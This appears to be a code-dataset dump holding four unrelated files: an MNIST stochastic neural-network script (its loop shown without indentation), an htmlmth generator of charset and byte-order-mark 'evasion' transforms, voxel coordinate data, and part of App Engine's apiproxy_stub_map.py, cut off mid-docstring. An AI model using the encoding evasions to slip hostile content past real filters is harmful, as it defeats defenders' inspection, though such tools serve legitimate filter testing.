(x_train, y_train), (x_test, y_test) = mnist.load_data()
# Scale pixel values from [0, 255] into [0, 1].
x_train = x_train.astype('float32')
x_test = x_test.astype('float32')
x_train /= 255
x_test /= 255
# Keep the full training set; only the first 800 test images are retained.
x_train = x_train[:60000]
x_test = x_test[:800]
print('x_train shape:', x_train.shape)
print(x_train.shape[0], 'train samples')
print(x_test.shape[0], 'test samples')
# convert class vectors to binary class matrices (one-hot labels)
y_train = keras.utils.to_categorical(y_train, num_last_classes)
y_test = keras.utils.to_categorical(y_test, num_last_classes)
y_train = y_train[:60000]
y_test = y_test[:800]
print(y_train.shape)
# Arrange the image tensors to match the backend's channel ordering.
if K.image_data_format() == 'channels_first':
    x_train = x_train.reshape(x_train.shape[0], 1, img_rows, img_cols)
    x_test = x_test.reshape(x_test.shape[0], 1, img_rows, img_cols)
    input_shape = (1, img_rows, img_cols)
else:
    x_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 1)
    x_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 1)
    input_shape = (img_rows, img_cols, 1)
# Binary (conventional floating-point) NN used as the reference network.
model = Sequential()
model.add(Conv2D(2, kernel_size=(4, 4),
                 input_shape=input_shape, use_bias=False)) # with APC
model.add(Activation('first_layer_activation')) # tanh(x*0.7) activation
model.add(Conv2D(3, kernel_size=(4, 4), use_bias=False)) # with APC
model.add(Activation('second_layer_activation')) # tanh(x*0.7) activation
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Flatten())
model.add(Dense(100)) # with APC
model.add(Activation('relu'))
model.add(Dense(num_last_classes)) # with APC
model.add(Activation('softmax'))
model.compile(loss=keras.losses.mse,
              optimizer=keras.optimizers.Adadelta(),
              metrics=['accuracy'])
# Training is disabled; pre-trained weights are loaded from disk instead.
#model.fit(x_train, y_train,
#          batch_size=batch_size,
#          epochs=epochs,
#          verbose=0,
#          callbacks=[WeightScaling_large.WeightScale()],
#          validation_data=(x_test, y_test))
#model.save_weights('v6.4_test_result_IntensiveTests_16.h5')
model.load_weights('v6.4_test_result_IntensiveTests_16.h5')
score = model.evaluate(x_test[:500], y_test[:500], verbose=0)
print('Test loss:', score[0])
print('Test accuracy:', score[1])
score = model.evaluate(x_test[:107], y_test[:107], verbose=0)
print('Test loss:', score[0])
print('Test accuracy:', score[1])
# Sub-models that expose intermediate layer outputs, used later to compare
# the binary network's activations against the stochastic network's.
#layer1model = Model(inputs=model.input, outputs=model.get_layer(index=1).output)
layer2model = Model(inputs=model.input, outputs=model.get_layer(index=2).output)
#layer3model = Model(inputs=model.input, outputs=model.get_layer(index=3).output)
layer4model = Model(inputs=model.input, outputs=model.get_layer(index=4).output)
layer5model = Model(inputs=model.input, outputs=model.get_layer(index=5).output)
#layer6model = Model(inputs=model.input, outputs=model.get_layer(index=6).output)
layer7model = Model(inputs=model.input, outputs=model.get_layer(index=7).output)
layer8model = Model(inputs=model.input, outputs=model.get_layer(index=8).output)
layer9model = Model(inputs=model.input, outputs=model.get_layer(index=9).output)
#layer10model = Model(inputs=model.input, outputs=model.get_layer(index=10).output)
# Hybrid NN with stochastic convolutional layer and binary dense layer
# SN length: number of bits in each stochastic number.
length = 1024*4
#length = 1024*4
ut = HOUtils()
# Convert the trained layer weights/biases into stochastic-number form.
# Layer indices refer to the Keras model built above (1 and 3: conv layers).
#bias_1_SNs = ut.GetConvolutionLayerBiasesSN(model, 1, length)
#weight_1_SNs = ut.GetConvolutionLayerWeightsSN(model, 1, length)
weight_1_SNs, bias_1_SNs, listIndex1 = ut.GetConvolutionLayerWeightsBiasesSN(model, 1, length, Adaptive="False")
#bias_3_SNs = ut.GetConvolutionLayerBiasesSN(model, 3, length)
#weight_3_SNs = ut.GetConvolutionLayerWeightsSN(model, 3, length)
weight_3_SNs, bias_3_SNs, listIndex3 = ut.GetConvolutionLayerWeightsBiasesSN(model, 3, length, Adaptive="False")
dense_7_biases = ut.GetConnectedLayerBiases(model, 7)
dense_7_weight_SNs = ut.GetConnectedLayerWeightsSN(model, 7, length)
# Currently, it cannot perform the 2nd dense layer with the stochastic
# numbers due to the range of the 1st dense layer results, so layer 9 keeps
# plain binary weights/biases.
dense_9_biases = ut.GetConnectedLayerBiases(model, 9)
dense_9_weights = ut.GetConnectedLayerWeights(model, 9)
#SN_input_matrix = np.full((img_rows, img_cols, length), False)
# Accumulators for the stochastic-inference loop that follows.
output = np.zeros((1, 10))
correct_predictions = 0
test_index = 0
output_mse = 0
print('start stochastic NN')
# for each input in the test set
for r in range(10):
x = x_test[test_index]
print(test_index)
# build input SN matrix
SN_input_matrix = np.full((img_rows, img_cols, length), False)
for i in range(img_rows):
for j in range(img_cols):
SN_input_matrix[i, j] = createSN(x[0, i, j], length)
del(x)
print('inputs generated')
# Generate the HOModel
hoModel = HOModel(SN_input_matrix)
del(SN_input_matrix)
# convolutional layer 1
hoModel.SetNumOutputPlanes(2) # The number of slices:2
hoModel.SetWeights(weight_1_SNs)
hoModel.SetZeroBias(2)
hoModel.SetListIndex(listIndex1)
hoConvLayer = HOConvolution(4, 4, length, baseMode="APC", activationFunc="BTanh", use_bias="False")
hoModel.Activation(hoConvLayer, stride=1)
del(hoConvLayer)
print('conv layer 1 done')
ut.SaveInTxtFormat('v8.0_intensive_snn_tests16_conv1', test_index,
hoModel.GetOutputMatrix(), 2, 25, 25,
layer2model, x_test)
print(str(test_index + 1) + ' conv 1 layer results saved in txt format')
# convolutional layer 2
hoModel.SetNumOutputPlanes(3) # The number of slices:3
hoModel.SetWeights(weight_3_SNs)
hoModel.SetZeroBias(3)
hoModel.SetListIndex(listIndex3)
hoConvLayer = HOConvolution(4, 4, length, baseMode="APC", activationFunc="BTanh", use_bias="False")
hoModel.Activation(hoConvLayer, stride=1)
del(hoConvLayer)
print('conv layer 2 done')
ut.SaveInTxtFormat('v8.0_intensive_snn_tests16_conv2', test_index,
hoModel.GetOutputMatrix(), 3, 22, 22,
layer4model, x_test)
print(str(test_index + 1) + ' conv 2 layer results saved in txt format')
# max pooling layer
hoMaxLayer = HOMaxPoolingExact(2, 2, length)
hoModel.Activation(hoMaxLayer, stride=2) # Stride:2, filterSize:2x2
del(hoMaxLayer)
print('max pool 1 done')
ut.SaveInTxtFormat('v8.0_intensive_snn_tests16_maxpool', test_index,
hoModel.GetOutputMatrix(), 3, 11, 11,
layer5model, x_test)
print(str(test_index+1)+' maxpool layer results saved in txt format')
# First dense layer
hoModel.SetNumOutputPlanes(1) # The number of slices:1
hoModel.SetDenseWeights(dense_7_weight_SNs)
hoModel.SetDenseBias(dense_7_biases)
hoDenseLayer = HOConnected(length, stochToInt="APC", activationFunc="Relu", use_bias="True")
hoModel.Activation(hoDenseLayer, num_classes=100)
del(hoDenseLayer)
################### For debugging purpose, save the intermidiate results in the local variable ###################
dense_output = hoModel.GetOutputMatrix()
print("dense 1 output from Binary NN")
BNN_prediction = layer8model.predict(np.asarray([x_test[test_index]]))
print(BNN_prediction)
del(BNN_prediction)
print("dense 1 output from Stochastic NN")
print(dense_output)
###################################################################################################################
print('dense 1 layer done')
# Second dense layer
dense_output = hoModel.GetOutputMatrix()
dense_output = ut.BinaryConnectedLAyer(100, num_last_classes, dense_output, dense_9_weights, dense_9_biases)
################### For debugging purpose, save the intermidiate results in the local variable ###################
print("dense 2 output from Binary NN")
BNN_prediction = layer9model.predict(np.asarray([x_test[test_index]]))
print(BNN_prediction)
del(BNN_prediction)
print("dense 2 output from Stochastic NN")
print(dense_output)
###################################################################################################################
print('dense 2 layer done')
out_error = 0
out = layer9model.predict(np.asarray([x_test[test_index]]))
for i in range(10):
out_error = out_error + (dense_output[0, i] - out[0, i])**2
print("out_error:", out_error)
output_mse = output_mse + out_error
# softmax activation
dense_out_exp = [np.exp(i) for i in dense_output]
exp_sum_out = np.sum(dense_out_exp)
hybrid_output = [i/exp_sum_out for i in dense_out_exp]
print('dense 2 done with the softmax activation function')
print("Keras Prediction of max argument of dense layer")
print(np.argmax(y_test[test_index]))
print("SNN results of dense layer")
print(np.argmax(hybrid_output))
if(np.argmax(hybrid_output) == np.argmax(y_test[test_index])):
correct_predictions = correct_predictions + 1
test_index = test_index + 1
current_accuracy = correct_predictions/test_index
print('current_accuracy')
print(current_accuracy)
del(dense_output)
del(hoModel)
correct_predictions = correct_predictions/10
print("correct classifications:", correct_predictions)
output_mse = output_mse/10
print("output_mse:", output_mse) | [
"yjod22@naver.com"
] | yjod22@naver.com |
b943ead1eacea576c10699349c9f96e7cc928967 | 2a53f6b341fad4c317d05d2302ce9243a028869c | /htmlmth/evasions/html/generate_encodings_py.py | 7ea90438e5798fd96b128fa6cff80849349a4e5b | [
"MIT"
] | permissive | OldSecureIQLab/htmlmth | 2cc5472f1086fed5d7e57b3e03446afe12a2e116 | 74d23ca2fa53e11b2587251d2f71c8f275548182 | refs/heads/main | 2023-08-11T15:48:57.838412 | 2021-09-15T17:13:40 | 2021-09-15T17:13:40 | 336,342,066 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,366 | py | # Too lazy to create evasions/html/encodings.py by hand
# Accumulates the full text of the generated encodings.py module.
document = ""
# Header emitted verbatim at the top of the generated file.
document += """from . import TransformFunction, string_to_tfarg_function, mime_type_based_transform, normalized_headers_to_tfarg_function
import htmlmth.mods.http
import htmlmth.mods.html
# This file was generated by generate_encodings_py.py"
"""
# (name of function in custom_encodings.py , name of encoding to place in descriptions)
all_encodings = [
    ("utf_8", "UTF-8"),
    ("utf_16_be", "UTF-16BE"),
    ("utf_16_le", "UTF-16LE"),
    ("utf_7_0", "UTF-7 variant 0"),
    ("utf_7_1", "UTF-7 variant 1"),
    ("utf_7_2", "UTF-7 variant 2"),
    ("utf_7_3", "UTF-7 variant 3"),
    ("utf_7_4", "UTF-7 variant 4"),
    ("utf_7_5", "UTF-7 variant 5"),
    ("utf_7_5_i", "UTF-7 variant 5i"),
]
# Charset names usable in an HTTP Content-Type charset declaration.
all_encoding_declarations = [
    "utf-8",
    "utf-16",
    "utf-16be",
    "utf-16le",
    "utf-7",
]
# (BOM byte sequence, human-readable encoding name) pairs.
all_bom = [
    ("\xef\xbb\xbf", "utf-8"),
    # ("", "utf-16"),
    ("\xfe\xff", "utf-16be"),
    ("\xff\xfe", "utf-16le"),
    # ("", "utf-7 (variant 0)"), # TODO: the correct variant that'll result in variants 1 OR 2 OR 3 OR 4 & not result in the first character being a random unicode char
    ("\x2b\x2f\x76\x38", "utf-7 (variant 1)"), # messes up the encoding of the first char since the 4th byte of the BOM is dependent on the first char
    ("\x2b\x2f\x76\x39", "utf-7 (variant 2)"), # messes up the encoding of the first char since the 4th byte of the BOM is dependent on the first char
    ("\x2b\x2f\x76\x2b", "utf-7 (variant 3)"), # messes up the encoding of the first char since the 4th byte of the BOM is dependent on the first char
    ("\x2b\x2f\x76\x2f", "utf-7 (variant 4)"), # messes up the encoding of the first char since the 4th byte of the BOM is dependent on the first char
    ("\x2b\x2f\x76\x38\x2d", "utf-7 (variant 5)"),
]
# MIME types for which each generated evasion registers a transform.
all_mime_types = [
    "text/html",
    "application/xhtml+xml",
    "application/xml",
    "text/xml",
    "text/javascript",
    "text/vbscript"
]
##### NO DECLARED ENCODING #####
# One evasion per encoding: the body is re-encoded, nothing declares it.
# NOTE: doubled braces {{ }} in the templates are literal braces after
# .format(); the numbered fields are filled per evasion.
description_template = "No encoding declared ;sent encoded as {}"
evasion_template = """# soft assumption that no encoding declared in the document
# soft assumption that encoding has not been declared in HTTP headers
# soft assumption that no BOM present
no_declared_encoding_encoded_as_{0} = TransformFunction("",
"{1}",
mime_type_based_transform({{
{2} }}))
"""
func1_dict_template = " '{0}': string_to_tfarg_function(lambda x: htmlmth.mods.html.{1}(x.encode('utf-8'))),\n"
for e in all_encodings:
    description = description_template.format(e[1])
    func1_dict = ""
    for m in all_mime_types:
        func1_dict += func1_dict_template.format(m, e[0])
    evasion = evasion_template.format(e[0], description, func1_dict)
    document += evasion + "\n"
##### DECLARE ENCODING IN HTTP HEADER #####
# Cross product: every declared charset x every actual encoding.
description_template = "declared as {} in http headers ;sent encoded as {}"
evasion_template = """# soft assumption that no encoding declared in the document
# soft assumption that no BOM present
http_declared_{4}_encoded_as_{0} = TransformFunction("",
"{1}",
mime_type_based_transform({{
{2} }}),
mime_type_based_transform({{
{3} }}))
"""
func1_dict_template = " '{0}': normalized_headers_to_tfarg_function(lambda x: htmlmth.mods.http.declare_encoding('{1}', x)),\n"
func2_dict_template = " '{0}': string_to_tfarg_function(lambda x: htmlmth.mods.html.{1}(x.encode('utf-8'))),\n"
for e in all_encodings:
    for ed in all_encoding_declarations:
        description = description_template.format(ed, e[1])
        func1_dict = ""
        func2_dict = ""
        for m in all_mime_types:
            func1_dict += func1_dict_template.format(m, ed)
        for m in all_mime_types:
            func2_dict += func2_dict_template.format(m, e[0])
        evasion = evasion_template.format(e[0], description, func1_dict, func2_dict, ed.replace('-', '_'))
        document += evasion + "\n"
##### DECLARE ENCODING WITH BOM #####
# Cross product: every BOM prefix x every actual encoding.
description_template = "{} BOM ;sent encoded as {}"
evasion_template = """# soft assumption that no encoding declared in the document
# soft assumption that encoding has not been declared in HTTP headers
bom_declared_{4}_encoded_as_{0} = TransformFunction("",
"{1}",
mime_type_based_transform({{
{2} }}),
mime_type_based_transform({{
{3} }}))
"""
func1_dict_template = " '{0}': string_to_tfarg_function(lambda x: htmlmth.mods.html.{1}(x.encode('utf-8'))),\n"
func2_dict_template = " '{0}': string_to_tfarg_function(lambda x: {1} + str(x)),\n"
for e in all_encodings:
    for bom in all_bom:
        description = description_template.format(bom[1], e[1])
        func1_dict = ""
        func2_dict = ""
        for m in all_mime_types:
            func1_dict += func1_dict_template.format(m, e[0])
        for m in all_mime_types:
            func2_dict += func2_dict_template.format(m, repr(bom[0]))
        evasion = evasion_template.format(e[0], description, func1_dict, func2_dict, bom[1].replace('-', '_').replace(" ", "_").replace("(", "").replace(")", ""))
        document += evasion + "\n"
##### DECLARE ENCODING IN HTTP HEADER AND WITH BOM #####
# Triple cross product: HTTP declaration x BOM x actual encoding.
description_template = "declared as {} in http headers ;{} BOM ;sent encoded as {}"
evasion_template = """# soft assumption that no encoding declared in the document
# soft assumption that encoding has not been declared in HTTP headers
# soft assumption that no BOM present
http_declared_{6}_bom_declared_{5}_encoded_as_{0} = TransformFunction("",
"{1}",
mime_type_based_transform({{
{2} }}),
mime_type_based_transform({{
{3} }}),
mime_type_based_transform({{
{4} }})
)
"""
func1_dict_template = " '{0}': string_to_tfarg_function(lambda x: htmlmth.mods.html.{1}(x.encode('utf-8'))),\n"
func2_dict_template = " '{0}': string_to_tfarg_function(lambda x: {1} + str(x)),\n"
func3_dict_template = " '{0}': normalized_headers_to_tfarg_function(lambda x: htmlmth.mods.http.declare_encoding('{1}', x)),\n"
for e in all_encodings:
    for ed in all_encoding_declarations:
        for bom in all_bom:
            description = description_template.format(ed, bom[1], e[1])
            func1_dict = ""
            func2_dict = ""
            func3_dict = ""
            for m in all_mime_types:
                func1_dict += func1_dict_template.format(m, e[0])
            for m in all_mime_types:
                func2_dict += func2_dict_template.format(m, repr(bom[0]))
            for m in all_mime_types:
                func3_dict += func3_dict_template.format(m, ed)
            evasion = evasion_template.format(e[0], description, func1_dict, func2_dict, func3_dict, bom[1].replace('-', '_').replace(" ", "_").replace("(", "").replace(")", ""), ed.replace('-', '_'))
            document += evasion + "\n"
##### DECLARE ENCODING IN DOCUMENT #####
# TODO:
# Echo the generated module for inspection, then write it to disk.
print(document)
with open("encodings.py", "w") as f:
    f.write(document)
| [
"CreatePhotonW@gmail.com"
] | CreatePhotonW@gmail.com |
b2d73bf7801bce94f947af621d2658b3dbbd6969 | 0b980e227018f631579e20187e60d7140e301eaf | /canstick2.py | 2323717881ad16a8731c05d281457a0facd6a51e | [] | no_license | saleelpk95/3D-Thinning | 91854ad04ca9e066e0caaa0daee9bceab4a7f605 | 197152089d29c983545f72807178185069cd1bb3 | refs/heads/master | 2021-01-15T20:09:47.397326 | 2017-11-22T19:42:59 | 2017-11-22T19:42:59 | 99,848,810 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,261 | py | widthGrid = 7
# Voxel-grid dimensions for the "canstick" model.
# NOTE(review): the voxel coordinates below span x,z in 0..7 and y in 0..1,
# so these values look like max indices rather than extents -- confirm
# against whatever consumes widthGrid/heightGrid/depthGrid.
heightGrid = 1
depthGrid = 7
# Flat list of occupied voxels, one dict of integer grid coordinates per
# voxel, grouped by layer (y).  Layer 0 is a solid octagonal cross-section;
# layer 1 keeps only the octagon's border cells.  The per-line comments
# give the running voxel index.
lookup = [ # 80 entries
    { 'x': 2, 'y': 0, 'z': 0 }, # layer 0 ( voxel 0 )
    { 'x': 3, 'y': 0, 'z': 0 }, # layer 0 ( voxel 1 )
    { 'x': 4, 'y': 0, 'z': 0 }, # layer 0 ( voxel 2 )
    { 'x': 5, 'y': 0, 'z': 0 }, # layer 0 ( voxel 3 )
    { 'x': 2, 'y': 0, 'z': 1 }, # layer 0 ( voxel 4 )
    { 'x': 3, 'y': 0, 'z': 1 }, # layer 0 ( voxel 5 )
    { 'x': 4, 'y': 0, 'z': 1 }, # layer 0 ( voxel 6 )
    { 'x': 5, 'y': 0, 'z': 1 }, # layer 0 ( voxel 7 )
    { 'x': 0, 'y': 0, 'z': 2 }, # layer 0 ( voxel 8 )
    { 'x': 1, 'y': 0, 'z': 2 }, # layer 0 ( voxel 9 )
    { 'x': 2, 'y': 0, 'z': 2 }, # layer 0 ( voxel 10 )
    { 'x': 3, 'y': 0, 'z': 2 }, # layer 0 ( voxel 11 )
    { 'x': 4, 'y': 0, 'z': 2 }, # layer 0 ( voxel 12 )
    { 'x': 5, 'y': 0, 'z': 2 }, # layer 0 ( voxel 13 )
    { 'x': 6, 'y': 0, 'z': 2 }, # layer 0 ( voxel 14 )
    { 'x': 7, 'y': 0, 'z': 2 }, # layer 0 ( voxel 15 )
    { 'x': 0, 'y': 0, 'z': 3 }, # layer 0 ( voxel 16 )
    { 'x': 1, 'y': 0, 'z': 3 }, # layer 0 ( voxel 17 )
    { 'x': 2, 'y': 0, 'z': 3 }, # layer 0 ( voxel 18 )
    { 'x': 3, 'y': 0, 'z': 3 }, # layer 0 ( voxel 19 )
    { 'x': 4, 'y': 0, 'z': 3 }, # layer 0 ( voxel 20 )
    { 'x': 5, 'y': 0, 'z': 3 }, # layer 0 ( voxel 21 )
    { 'x': 6, 'y': 0, 'z': 3 }, # layer 0 ( voxel 22 )
    { 'x': 7, 'y': 0, 'z': 3 }, # layer 0 ( voxel 23 )
    { 'x': 0, 'y': 0, 'z': 4 }, # layer 0 ( voxel 24 )
    { 'x': 1, 'y': 0, 'z': 4 }, # layer 0 ( voxel 25 )
    { 'x': 2, 'y': 0, 'z': 4 }, # layer 0 ( voxel 26 )
    { 'x': 3, 'y': 0, 'z': 4 }, # layer 0 ( voxel 27 )
    { 'x': 4, 'y': 0, 'z': 4 }, # layer 0 ( voxel 28 )
    { 'x': 5, 'y': 0, 'z': 4 }, # layer 0 ( voxel 29 )
    { 'x': 6, 'y': 0, 'z': 4 }, # layer 0 ( voxel 30 )
    { 'x': 7, 'y': 0, 'z': 4 }, # layer 0 ( voxel 31 )
    { 'x': 0, 'y': 0, 'z': 5 }, # layer 0 ( voxel 32 )
    { 'x': 1, 'y': 0, 'z': 5 }, # layer 0 ( voxel 33 )
    { 'x': 2, 'y': 0, 'z': 5 }, # layer 0 ( voxel 34 )
    { 'x': 3, 'y': 0, 'z': 5 }, # layer 0 ( voxel 35 )
    { 'x': 4, 'y': 0, 'z': 5 }, # layer 0 ( voxel 36 )
    { 'x': 5, 'y': 0, 'z': 5 }, # layer 0 ( voxel 37 )
    { 'x': 6, 'y': 0, 'z': 5 }, # layer 0 ( voxel 38 )
    { 'x': 7, 'y': 0, 'z': 5 }, # layer 0 ( voxel 39 )
    { 'x': 2, 'y': 0, 'z': 6 }, # layer 0 ( voxel 40 )
    { 'x': 3, 'y': 0, 'z': 6 }, # layer 0 ( voxel 41 )
    { 'x': 4, 'y': 0, 'z': 6 }, # layer 0 ( voxel 42 )
    { 'x': 5, 'y': 0, 'z': 6 }, # layer 0 ( voxel 43 )
    { 'x': 2, 'y': 0, 'z': 7 }, # layer 0 ( voxel 44 )
    { 'x': 3, 'y': 0, 'z': 7 }, # layer 0 ( voxel 45 )
    { 'x': 4, 'y': 0, 'z': 7 }, # layer 0 ( voxel 46 )
    { 'x': 5, 'y': 0, 'z': 7 }, # layer 0 ( voxel 47 )
    { 'x': 2, 'y': 1, 'z': 0 }, # layer 1 ( voxel 48 )
    { 'x': 3, 'y': 1, 'z': 0 }, # layer 1 ( voxel 49 )
    { 'x': 4, 'y': 1, 'z': 0 }, # layer 1 ( voxel 50 )
    { 'x': 5, 'y': 1, 'z': 0 }, # layer 1 ( voxel 51 )
    { 'x': 2, 'y': 1, 'z': 1 }, # layer 1 ( voxel 52 )
    { 'x': 3, 'y': 1, 'z': 1 }, # layer 1 ( voxel 53 )
    { 'x': 4, 'y': 1, 'z': 1 }, # layer 1 ( voxel 54 )
    { 'x': 5, 'y': 1, 'z': 1 }, # layer 1 ( voxel 55 )
    { 'x': 0, 'y': 1, 'z': 2 }, # layer 1 ( voxel 56 )
    { 'x': 1, 'y': 1, 'z': 2 }, # layer 1 ( voxel 57 )
    { 'x': 6, 'y': 1, 'z': 2 }, # layer 1 ( voxel 58 )
    { 'x': 7, 'y': 1, 'z': 2 }, # layer 1 ( voxel 59 )
    { 'x': 0, 'y': 1, 'z': 3 }, # layer 1 ( voxel 60 )
    { 'x': 1, 'y': 1, 'z': 3 }, # layer 1 ( voxel 61 )
    { 'x': 6, 'y': 1, 'z': 3 }, # layer 1 ( voxel 62 )
    { 'x': 7, 'y': 1, 'z': 3 }, # layer 1 ( voxel 63 )
    { 'x': 0, 'y': 1, 'z': 4 }, # layer 1 ( voxel 64 )
    { 'x': 1, 'y': 1, 'z': 4 }, # layer 1 ( voxel 65 )
    { 'x': 6, 'y': 1, 'z': 4 }, # layer 1 ( voxel 66 )
    { 'x': 7, 'y': 1, 'z': 4 }, # layer 1 ( voxel 67 )
    { 'x': 0, 'y': 1, 'z': 5 }, # layer 1 ( voxel 68 )
    { 'x': 1, 'y': 1, 'z': 5 }, # layer 1 ( voxel 69 )
    { 'x': 6, 'y': 1, 'z': 5 }, # layer 1 ( voxel 70 )
    { 'x': 7, 'y': 1, 'z': 5 }, # layer 1 ( voxel 71 )
    { 'x': 2, 'y': 1, 'z': 6 }, # layer 1 ( voxel 72 )
    { 'x': 3, 'y': 1, 'z': 6 }, # layer 1 ( voxel 73 )
    { 'x': 4, 'y': 1, 'z': 6 }, # layer 1 ( voxel 74 )
    { 'x': 5, 'y': 1, 'z': 6 }, # layer 1 ( voxel 75 )
    { 'x': 2, 'y': 1, 'z': 7 }, # layer 1 ( voxel 76 )
    { 'x': 3, 'y': 1, 'z': 7 }, # layer 1 ( voxel 77 )
    { 'x': 4, 'y': 1, 'z': 7 }, # layer 1 ( voxel 78 )
    { 'x': 5, 'y': 1, 'z': 7 }  # layer 1 ( voxel 79 )
]
"saleelpk95@gmail.com"
] | saleelpk95@gmail.com |
b5603b0c427e91c8e8c47439c7e4f5c9e0981c81 | 57cd8d92675227a16f54c6cf3fe2a7266221364b | /google-blog-converters-r79/lib/googleappengine/python/google/appengine/api/apiproxy_stub_map.py | 716498f8344a2ec50b288fe5e79e7b360509d2d3 | [
"Apache-2.0",
"BSD-3-Clause",
"MIT"
] | permissive | hylom/pyblosxom2wp | 7265cb39cacccffb7fd333f545b76953502f9c92 | fa500acb2b7be96d9371958970be55eddbd7fc3c | refs/heads/master | 2016-09-05T20:15:27.197969 | 2009-12-01T16:55:29 | 2009-12-01T16:55:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,264 | py | #!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Container of APIProxy stubs for more convenient unittesting.
Classes/variables/functions defined here:
APIProxyStubMap: container of APIProxy stubs.
apiproxy: global instance of an APIProxyStubMap.
MakeSyncCall: APIProxy entry point.
UserRPC: User-visible class wrapping asynchronous RPCs.
"""
import inspect
import sys
from google.appengine.api import apiproxy_rpc
def CreateRPC(service):
  """Creates a RPC instance for the given service.

  The instance is suitable for talking to remote services.
  Each RPC instance can be used only once, and should not be reused.

  Args:
    service: string representing which service to call.

  Returns:
    the rpc object.

  Raises:
    AssertionError or RuntimeError if the stub for service doesn't supply a
    CreateRPC method.
  """
  stub = apiproxy.GetStub(service)
  assert stub, 'No api proxy found for service "%s"' % service
  # The original message expression was ('... "%s" ...' + '...' % service):
  # % binds tighter than +, so it applied % to the wrong fragment and raised
  # a TypeError instead of producing the message.  Format the whole string.
  assert hasattr(stub, 'CreateRPC'), (
      'The service "%s" doesn\'t have a CreateRPC method.' % service)
  return stub.CreateRPC()
def MakeSyncCall(service, call, request, response):
  """Synchronous APIProxy entry point; delegates to the global stub map.

  Blocks until `response` has been filled in by the stub registered for
  `service` (or the default stub).

  Args:
    service: string representing which service to call
    call: string representing which function to call
    request: protocol buffer for the request
    response: protocol buffer for the response

  Raises:
    apiproxy_errors.Error or a subclass.
  """
  apiproxy.MakeSyncCall(service, call, request, response)
class ListOfHooks(object):
  """An ordered collection of hooks for a particular API call.

  A hook is a function that has exactly the same signature as
  a service stub.  It will be called before or after an api call is
  executed, depending on whether this list is for precall or postcall hooks.
  Hooks can be used for debugging purposes (check certain
  pre- or postconditions on api calls) or to apply patches to protocol
  buffers before/after a call gets submitted.
  """

  def __init__(self):
    """Constructor."""
    # Ordered list of (key, function, service, num_args) tuples.
    self.__content = []
    # Set of (key, module) pairs already registered, for de-duplication.
    self.__unique_keys = set()

  def __len__(self):
    """Returns the amount of elements in the collection."""
    return self.__content.__len__()

  def __Insert(self, index, key, function, service=None):
    """Inserts a hook at a certain position in the list.

    Args:
      index: the index of where to insert the function
      key: a unique key (within the module) for this particular function.
        If something from the same module with the same key is already
        registered, nothing will be added.
      function: the hook to be added.
      service: optional argument that restricts the hook to a particular api

    Returns:
      True if the collection was modified.
    """
    unique_key = (key, inspect.getmodule(function))
    if unique_key in self.__unique_keys:
      return False
    # inspect.getargspec() was removed in Python 3.11; prefer
    # getfullargspec() and fall back for interpreters that predate it.
    try:
      argspec = inspect.getfullargspec(function)
    except AttributeError:
      argspec = inspect.getargspec(function)
    num_args = len(argspec[0])
    if inspect.ismethod(function):
      num_args -= 1  # don't count the bound 'self' argument
    self.__content.insert(index, (key, function, service, num_args))
    self.__unique_keys.add(unique_key)
    return True

  def Append(self, key, function, service=None):
    """Appends a hook at the end of the list.

    Args:
      key: a unique key (within the module) for this particular function.
        If something from the same module with the same key is already
        registered, nothing will be added.
      function: the hook to be added.
      service: optional argument that restricts the hook to a particular api

    Returns:
      True if the collection was modified.
    """
    return self.__Insert(len(self), key, function, service)

  def Push(self, key, function, service=None):
    """Inserts a hook at the beginning of the list.

    Args:
      key: a unique key (within the module) for this particular function.
        If something from the same module with the same key is already
        registered, nothing will be added.
      function: the hook to be added.
      service: optional argument that restricts the hook to a particular api

    Returns:
      True if the collection was modified.
    """
    return self.__Insert(0, key, function, service)

  def Clear(self):
    """Removes all hooks from the list (useful for unit tests)."""
    self.__content = []
    self.__unique_keys = set()

  def Call(self, service, call, request, response, rpc=None):
    """Invokes all hooks in this collection that apply to `service`.

    Hooks registered with a 5-argument signature also receive the rpc.

    Args:
      service: string representing which service to call
      call: string representing which function to call
      request: protocol buffer for the request
      response: protocol buffer for the response
      rpc: optional RPC used to make this call
    """
    for key, function, srv, num_args in self.__content:
      if srv is None or srv == service:
        if num_args == 5:
          function(service, call, request, response, rpc)
        else:
          function(service, call, request, response)
class APIProxyStubMap(object):
  """Container of APIProxy stubs for more convenient unittesting.

  Stubs may be either trivial implementations of APIProxy services (e.g.
  DatastoreFileStub, UserServiceStub) or "real" implementations.

  For unittests, we may want to mix and match real and trivial implementations
  of services in order to better focus testing on individual service
  implementations.  To achieve this, we allow the client to attach stubs to
  service names, as well as define a default stub to be used if no specific
  matching stub is identified.
  """

  def __init__(self, default_stub=None):
    """Constructor.

    Args:
      default_stub: optional stub

    'default_stub' will be used whenever no specific matching stub is found.
    """
    self.__stub_map = {}
    self.__default_stub = default_stub
    self.__precall_hooks = ListOfHooks()
    self.__postcall_hooks = ListOfHooks()

  def GetPreCallHooks(self):
    """Gets the collection of all precall hooks."""
    return self.__precall_hooks

  def GetPostCallHooks(self):
    """Gets the collection of all postcall hooks."""
    # (Original docstring said "precall" here -- copy-paste error.)
    return self.__postcall_hooks

  def RegisterStub(self, service, stub):
    """Register the provided stub for the specified service.

    Args:
      service: string
      stub: stub
    """
    # 'in' replaces the Python-2-only dict.has_key().
    assert service not in self.__stub_map, repr(service)
    self.__stub_map[service] = stub
    if service == 'datastore':
      # The datastore stub also answers for the v3 service name.
      self.RegisterStub('datastore_v3', stub)

  def GetStub(self, service):
    """Retrieve the stub registered for the specified service.

    Args:
      service: string

    Returns:
      stub

    Returns the stub registered for 'service', and returns the default stub
    if no such stub is found.
    """
    return self.__stub_map.get(service, self.__default_stub)

  def MakeSyncCall(self, service, call, request, response):
    """The APIProxy entry point.

    Args:
      service: string representing which service to call
      call: string representing which function to call
      request: protocol buffer for the request
      response: protocol buffer for the response

    Raises:
